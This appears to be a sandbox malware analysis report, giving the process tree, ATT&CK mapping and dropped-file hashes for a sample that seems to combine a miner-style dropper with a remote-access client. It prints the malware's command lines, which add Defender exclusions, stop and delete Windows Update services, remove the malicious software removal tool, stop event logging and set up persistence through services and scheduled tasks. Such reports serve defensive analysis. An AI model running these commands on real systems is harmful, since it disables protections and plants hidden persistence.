C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2800

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2980

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3288

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428
- C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
  "C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe
    "C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4824
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4860
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1836
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1372
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5036
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2036
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4932
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3872
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1396
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:4868
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4256
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2836
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1300
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2464
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2788
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5104
- - C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe
    "C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1900
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4436
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4512
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3172
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2728
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:3668
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:664
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:2680
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:3876
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        
        PID:2508
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:4320
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1380
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3596
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2256
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:1008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      PID:524
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3324
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:4792
- - C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe
    "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4060
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4688
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1136

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1180

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4828

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:924

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe dfbcb10f7dbb45539628a052af05e80a Wn+XLMc750OS4d2v/7R3zg.0.1.0.0.0
1⤵
PID:3124
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4472

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4956

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1692
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:664
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1628
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4704
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3892
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4008
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3876
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2548
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2892
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3088
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3376
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3948
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3424
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3580
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20b2f6ad2d2accd37fbd46b9d9bf8989

SHA1
91db3ff9493d1ab55efb65b715a2a8c61a72adbd

SHA256
32fef7d0dd7c43bd3440fca325e363d04b667c385d13d4dd44528f35b0167bed

SHA512
acf13e39320da7837d169c2575d6575eb638f41f6deead0915785269effebe334adc5f8d73d6621aa4eea047b261fabd50ffc9449f47126953534059e8ff7501

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a2c8179aaa149c0b9791b73ce44c04d1

SHA1
703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

SHA256
c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

SHA512
2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1z1zm14b.11o.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Windows\Logs\CBS\CBS.log

Filesize
1KB

MD5
20890f5f1801a4c4148c25591689c726

SHA1
75a14f547d24e36d0d997d6b13863581285d6e63

SHA256
fbe232ea7026c75250a5eaca2992a03848b8703be3f55a26f88260a507140991

SHA512
06f9fd48685b2f29ac680a23229260d7024669f5d31469c5a0d28cf23ce88c50c7ccb153106de89b03f976bae4e850ac11a13dd0872395dacfece400a5f23508

Download Submit
C:\Windows\System32\Tasks\dialersvc32

Filesize
3KB

MD5
f57091b26bda5edbd99d764b6c067747

SHA1
7e8a2f1f4df8663c0eab64f2aeaa25daf5371389

SHA256
ece7e64bc1c77cbf05347a9d034a05e9c47e7680c70d402792e911f9c967b13b

SHA512
8c3cb3a07107a2ff6d76399f7266dec545eae66de3cac9f89845486aed7de090f8c6607f9c4c13f5194cc4d8704a0334feede58422119c4d1921b5c1b22d6a56

Download Submit
C:\Windows\System32\Tasks\dialersvc64

Filesize
3KB

MD5
3257e7b601578a87a7a7f8f960447d1a

SHA1
4176af111fd2d137d341f45ad29299939b85d50a

SHA256
6b86add68f2173ca7b91289f04b84359733b62853e52e2297a556a52fad266a9

SHA512
ca1bcbe878d36be704c31056da25c608eb204403934c4c1bca4c62ad03d7e291e14fdb40881776cdccb50a6f25ccddbe023cdcc29bf259e12228617b074da235

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
9280d4b5e356adcc98c24ed7b7f2b596

SHA1
88d814def76f55ddf8327d4d9eb5f1ea9a248158

SHA256
af6acd6a96670619a0d987a46a428fc879fc82923280902bd434f86cb8a866c3

SHA512
eedc4ec54783b943a9c8a5c964ec5db3ac5ad46d60c0fc690c9bbcd77094436d1687d058dc8add596b3318760a404e745092ccab411d9b77c6f01fe01fa9b99c

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
ba6b23f4c3b8c81b89836e34943e3741

SHA1
57058c39026586c44cd0f5600706256551c228d3

SHA256
294c1a5bbc87ff21d42e6d824b19bcb03b05ab5cd8a14ee16b1f81281006dbf3

SHA512
acf35ea79e5cef09538d043d115f406d52e8f0a1f6dccb71f29f00db524f1c313b6628a657653cf06725a79178e2165ee1270711f8e65e405dd2b3cae06143b4

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
69bc600a830051ab50e4f6a2db64f957

SHA1
bdcb0c312e7c5a6add74098f9291056b80d7c029

SHA256
5e13fe8ad75ecfd56bc310c42743d76e2c95672943f1f30415854e034f6615b4

SHA512
a8b76be9ecabbd5fbc42d668758d287a416993877e6477620bc7cc576e1eb581155f2dbe6ab1f963fa74a6be36fdd0f381761f7a2cae790c014e439f1fe43add

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
5f3127674df0bca049c06eb0e767ea00

SHA1
b2176902af6c4ba0e1c995f20b6ddd667d217361

SHA256
46f6540120764086c6cff55e302237088f924b9e2e18e7985dabd0d4b9cb057a

SHA512
23081e2c3067dd4a4de164bccdf290a6c5a5707c17006d119940592f490fa58808b0ce829ed4e7811e4096c03908f38c15faabe8c6060b9ef34e04e5b5873201

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
4KB

MD5
7b1fe6890101f73a0c9796d8d585b168

SHA1
56eb99ee341b880cf7a80ebc705371aea87b3743

SHA256
93ea56ad38069dbc3d1ae192afd3f3dc8704e9298752f73729b95cf3298dcaca

SHA512
fe73cccfadc916f613fbcc7a80ec82ae1228ea2aa28bba4515851e82463e76942ff3a3d6bcc78ea666a841d89220fb49b8fa52279985e88fe0aec6728f21aefa

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e7a623fcc311b5017c82b1181911569

SHA1
048d36afc6481760c53cff348c05744d98f3cce7

SHA256
9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d

SHA512
3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231

Download Submit
memory/384-101-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/384-100-0x000001A4021B0000-0x000001A4021DB000-memory.dmp

Filesize
172KB

Download
memory/436-31-0x0000000000D30000-0x0000000000DB4000-memory.dmp

Filesize
528KB

Download
memory/436-30-0x00007FFA5E943000-0x00007FFA5E945000-memory.dmp

Filesize
8KB

Download
memory/436-38-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

Filesize
10.8MB

Download
memory/436-32-0x00007FFA5E940000-0x00007FFA5F401000-memory.dmp

Filesize
10.8MB

Download
memory/628-92-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/628-90-0x000001D1805B0000-0x000001D1805D4000-memory.dmp

Filesize
144KB

Download
memory/628-91-0x000001D1805E0000-0x000001D18060B000-memory.dmp

Filesize
172KB

Download
memory/680-95-0x0000020635B80000-0x0000020635BAB000-memory.dmp

Filesize
172KB

Download
memory/680-96-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/740-105-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/740-104-0x000001ADFA6D0000-0x000001ADFA6FB000-memory.dmp

Filesize
172KB

Download
memory/868-114-0x00000212CE660000-0x00000212CE68B000-memory.dmp

Filesize
172KB

Download
memory/868-115-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/960-108-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/960-107-0x000001DE1BDA0000-0x000001DE1BDCB000-memory.dmp

Filesize
172KB

Download
memory/1092-118-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/1092-117-0x000001F5F60B0000-0x000001F5F60DB000-memory.dmp

Filesize
172KB

Download
memory/1100-121-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/1100-120-0x000001BF2E170000-0x000001BF2E19B000-memory.dmp

Filesize
172KB

Download
memory/1144-124-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/1144-123-0x0000020CDEA90000-0x0000020CDEABB000-memory.dmp

Filesize
172KB

Download
memory/1188-128-0x000002622A160000-0x000002622A18B000-memory.dmp

Filesize
172KB

Download
memory/1188-129-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
